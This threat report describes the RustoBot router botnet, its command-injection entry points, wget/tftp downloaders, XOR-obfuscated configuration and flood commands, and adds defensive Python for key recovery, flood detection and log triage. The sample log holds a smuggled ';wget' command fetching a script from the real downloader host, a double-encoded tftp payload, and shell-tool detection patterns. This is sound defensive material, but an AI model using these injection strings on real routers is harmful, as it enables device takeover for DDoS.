A new malware family named “RustoBot” has been discovered exploiting vulnerabilities in several router models to gain unauthorized access to the devices and use them for Distributed Denial of Service (DDoS) attacks.
First observed in January and February 2025, it targets TOTOLINK and DrayTek devices and combines techniques not seen together in previously known router botnets.
The botnet leverages multiple command injection vulnerabilities, primarily in TOTOLINK’s cstecgi.cgi script and DrayTek’s cgi-bin/mainfunction.cgi/apmcfgupload interface.
These vulnerabilities allow a remote attacker to run arbitrary system commands on the router.
RustoBot spreads through several downloader scripts that fetch the payload with common tools such as wget and tftp, with builds for devices of different architectures, including arm5, arm6, arm7, mips, mpsl, and x86.
Upon infection, RustoBot keeps its configuration encrypted with the XOR algorithm; rather than storing the key, it computes it at runtime through a series of calculations before decoding the ciphertext.
This keeps the C2 domains and other settings out of reach of a plain string scan and hinders signature-based detection.
Once decoded, the configuration supplies the command and control (C2) server domains the bot resolves and the parameters it uses when executing DDoS attacks.
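To show why a computed XOR key offers little protection once an analyst has a known plaintext, here is an added example (not RustoBot's code, and not the real key schedule, which the page does not describe). It packs a constructed configuration made of the C2 hosts and the IP from the indicator table below into a NUL-separated blob, XOR-encrypts it with an 8-byte key derived from a 16-bit seed through an assumed LCG-style schedule, and then recovers the seed by brute force using the shared domain suffix "anondns.net" as the crib.

```python
# Added illustration of XOR-obfuscated configuration and its recovery.
# The key schedule, seed size and blob layout are assumptions for the
# example; they are not taken from RustoBot.

# Constructed sample config; the values are the IOCs listed on this page.
SAMPLE_CONFIG = [
    "rustbot.anondns.net",
    "dvrhelper.anondns.net",
    "techsupport.anondns.net",
    "5.255.125.150",
]
CRIB = b"anondns.net"  # known plaintext: every C2 domain shares this suffix


def derive_key(seed: int, length: int = 8) -> bytes:
    """Assumed key schedule: an LCG stepped once per key byte, taking
    bits 16..23 of the state. Any deterministic function of a small seed
    has the same weakness: the seed space can be enumerated."""
    state = seed & 0xFFFFFFFF
    out = bytearray()
    for _ in range(length):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack_config(entries) -> bytes:
    """NUL-terminated strings, the layout most embedded bots use."""
    return b"\x00".join(e.encode() for e in entries) + b"\x00"


def encrypt_config(entries, seed: int) -> bytes:
    return xor_bytes(pack_config(entries), derive_key(seed))


def decode_config(blob: bytes, seed: int):
    """What the bot does at runtime once it has computed the key."""
    plain = xor_bytes(blob, derive_key(seed))
    return [f.decode(errors="replace") for f in plain.split(b"\x00") if f]


def recover_seed(blob: bytes, crib: bytes, seed_bits: int = 16):
    """Analyst side: enumerate the seed space and accept the first seed
    whose decoded blob contains the crib. With an 11-byte crib a wrong
    seed matching by chance needs roughly an 88-bit coincidence, while
    the seed space is only 2**seed_bits, so the first hit is the key."""
    for seed in range(1 << seed_bits):
        if crib in xor_bytes(blob, derive_key(seed)):
            return seed
    return None


if __name__ == "__main__":
    blob = encrypt_config(SAMPLE_CONFIG, seed=0x1337)
    seed = recover_seed(blob, CRIB)
    print("recovered seed:", hex(seed))
    print("decoded config:", decode_config(blob, seed))
```

The point for an analyst is that the "complex calculations" only need to be reimplemented once, or not at all: a crib taken from the expected content of the configuration (a C2 domain suffix, a user-agent string, a hard-coded port) is enough to confirm a candidate key, and the brute force cost is set by the seed space, not by the complexity of the schedule.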
Reverse engineering of the malware’s entry point shows that it reaches the system API functions it needs through offsets rather than direct, easily recognizable calls, a further obstacle to static analysis.
RustoBot supports several DDoS attack methods, including Raw IP, TCP, and UDP flooding.
It receives attack parameters from the C2 server and starts an attack when it gets one of a set of predefined commands.
For example, the 0x03 command triggers a UDP flood; its arguments specify the victim IP addresses, port numbers, attack duration, and packet lengths.
This structured command set lets the operators direct the whole botnet at a chosen target with exact timing and packet sizes.
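The attack parameters above (victim address, destination port, duration, packet length) translate into a traffic pattern defenders can look for: one destination hit at a high packet rate from many sources. The following added example, not code from the report or the malware, aggregates flow records per (victim, protocol, port) and flags targets that exceed a source-count and packet-rate threshold. The flow records are constructed for the example; the field names and thresholds are assumptions a real deployment would tune to its netflow/IPFIX source.

```python
# Added example: flood detection over flow records. Records and
# thresholds are constructed for illustration, not captured traffic.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int        # seconds since start of the capture window
    src: str
    dst: str
    proto: str     # "udp", "tcp" or "ip" (raw IP)
    dport: int     # 0 for raw IP flows
    packets: int


@dataclass(frozen=True)
class FloodAlert:
    victim: str
    proto: str
    dport: int
    sources: int   # distinct source addresses seen
    pps: float     # packets per second across the group's time span


def detect_floods(flows, min_sources: int = 20, min_pps: float = 10000.0):
    """Group flows by (victim, proto, dport) and flag groups that are fed
    by many distinct sources at a packet rate above min_pps. Requiring
    both conditions keeps a single busy client or a CDN fetch from
    tripping the detector."""
    groups = defaultdict(list)
    for f in flows:
        groups[(f.dst, f.proto, f.dport)].append(f)

    alerts = []
    for (dst, proto, dport), fs in groups.items():
        span = max(f.ts for f in fs) - min(f.ts for f in fs) + 1  # inclusive seconds
        pps = sum(f.packets for f in fs) / span
        sources = len({f.src for f in fs})
        if sources >= min_sources and pps >= min_pps:
            alerts.append(FloodAlert(dst, proto, dport, sources, pps))
    return sorted(alerts, key=lambda a: -a.pps)


def constructed_flows():
    """Sample data: a 3-second UDP flood on 198.51.100.10:80 from 40
    sources, normal DNS traffic to a resolver, and one fast TCP session
    from a single client that must not be flagged."""
    flood = [Flow(t, f"203.0.113.{i}", "198.51.100.10", "udp", 80, 900)
             for t in range(3) for i in range(1, 41)]
    dns = [Flow(t, f"192.0.2.{i}", "198.51.100.53", "udp", 53, 5)
           for t in range(3) for i in range(1, 6)]
    single_client = [Flow(0, "192.0.2.99", "198.51.100.10", "tcp", 443, 50000)]
    return flood + dns + single_client


if __name__ == "__main__":
    for alert in detect_floods(constructed_flows()):
        print(alert)
```

The same aggregation covers the bot's TCP and Raw IP floods because the grouping key carries the protocol; for raw IP traffic the port is zero and the rate threshold does the work on its own.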
The campaigns were observed in Japan, Taiwan, Vietnam, and Mexico, with the technology sector most affected.
Beyond the compromise of the routers themselves, the attacks put at risk the operations of businesses that rely on these devices as their internet gateways.
To combat this threat, FortiGuard Labs has integrated multiple protective measures into its security solutions.
According to the report, Fortinet also advises organizations to strengthen endpoint monitoring and authentication, and points to training such as its Fortinet Certified Fundamentals (FCF) in Cybersecurity.
FortiGuard Labs urges everyone in the cybersecurity community to remain vigilant and proactive against this emerging threat.
Indicators of compromise:

| Type | Value |
|---|---|
| URL | hxxp://66[.]63[.]187[.]69/w.sh |
| URL | hxxp://66[.]63[.]187[.]69/wget.sh |
| URL | hxxp://66[.]63[.]187[.]69/tftp.sh |
| Host | dvrhelper[.]anondns[.]net |
| Host | techsupport[.]anondns[.]net |
| Host | rustbot[.]anondns[.]net |
| IP | 5[.]255[.]125[.]150 |
| File Hash | 76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454 |
| File Hash | 75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385 |
| File Hash | … |
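The two CGI paths named earlier and the indicators in the table combine into a simple web-log check. The following added example (not part of the report) parses lines in the common combined access-log format, URL-decodes the request twice to catch double-encoded payloads, and tags each request that touches cstecgi.cgi or mainfunction.cgi/apmcfgupload, contains shell metacharacters or download tools alongside one of those paths, references an IOC in the request, or comes from an IOC address. The log lines are constructed, the parameter names in them are placeholders, and the IOC values are the table's entries with the defanging removed.

```python
# Added example: access-log triage for RustoBot exploitation attempts and
# IOC hits. Sample log lines below are constructed, not real traffic.
import re
from urllib.parse import unquote_plus

# IOCs from the indicator table above (defanging removed).
IOC_IPS = {"66.63.187.69", "5.255.125.150"}
IOC_HOSTS = {"dvrhelper.anondns.net", "techsupport.anondns.net",
             "rustbot.anondns.net"}

# CGI endpoints the report names as the injection points.
TARGET_PATHS = ("cstecgi.cgi", "mainfunction.cgi/apmcfgupload")

# Shell metacharacters and the download tools the downloader scripts use.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\b(?:wget|tftp|curl)\b")

# Combined log format: host ident user [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2025:03:14:07 +0000] "POST /cgi-bin/cstecgi.cgi?param=%3Bwget+http%3A%2F%2F66.63.187.69%2Fw.sh HTTP/1.1" 200 512 "-" "-"
198.51.100.23 - - [10/Feb/2025:03:15:00 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=abc123 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Feb/2025:03:15:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
5.255.125.150 - - [10/Feb/2025:03:16:41 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?x=%2560tftp%2560 HTTP/1.1" 500 0 "-" "-"
"""


def analyze_line(line: str):
    """Return a dict describing the request and its findings, or None for
    lines that do not parse or raise no finding."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice: %2560 -> %60 -> backtick. Attackers double-encode to
    # slip past filters that decode only once.
    uri = unquote_plus(unquote_plus(m["uri"]))

    findings = []
    on_target = any(p in uri for p in TARGET_PATHS)
    if on_target:
        findings.append("target-path")
    if on_target and SHELL_META.search(uri):
        findings.append("cmd-injection-attempt")
    if any(ip in uri for ip in IOC_IPS) or any(h in uri for h in IOC_HOSTS):
        findings.append("ioc-in-request")
    if m["src"] in IOC_IPS:
        findings.append("ioc-source")

    if not findings:
        return None
    return {"src": m["src"], "ts": m["ts"], "uri": uri, "findings": findings}


def scan_log(text: str):
    """Run analyze_line over every line and keep the hits, in log order."""
    return [r for r in (analyze_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], hit["ts"], hit["findings"], hit["uri"])
```

A plain "target-path" hit is informational (legitimate management traffic reaches these CGIs too); "cmd-injection-attempt" on a router that is not supposed to expose its management interface to the WAN, or any "ioc-source"/"ioc-in-request" tag, is worth an immediate look at the device and at outbound connections to the listed hosts.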